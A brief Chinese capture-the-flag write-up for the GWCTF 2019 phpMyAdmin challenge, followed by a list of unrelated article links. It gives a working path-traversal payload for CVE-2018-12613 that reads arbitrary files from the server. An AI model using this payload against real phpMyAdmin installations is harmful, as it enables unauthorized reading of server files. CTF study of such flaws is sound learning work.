[GWCTF 2019]我有一个数据库
信息泄露,存在robots.txt。
然后发现存在phpmyadmin,可以实现任意文件读取(CVE-2018-12613(phpmyadmin远程文件包含漏洞)):
phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag
直接get flag。
相关文章
- 01-19Spring Boot2 系列教程 (二) | 第一个 SpringBoot 工程详解
- 01-19Spring Boot2 系列教程 (二) | 第一个 SpringBoot 工程详解
- 01-19自己实现一个栈结构
- 01-192019安徽省程序设计 D.自驾游(最短路)
- 01-19清北学堂(2019 5 2上午) part 5
- 01-19APIO 2019 桥梁
- 01-19《细说PHP》第四版 样章 第18章 数据库抽象层PDO 8
- 01-19cad.net dll动态加载,在一个dll查找引用了的dll,查找dll依赖.dll热插拔,加载dll运行出错
- 01-19SQL中将某个表中的多行数据在一个字段显示
- 01-19使用二分查找法,查找一个有序的int[]中的某个数,并返回下标位置,如果不存在返回-1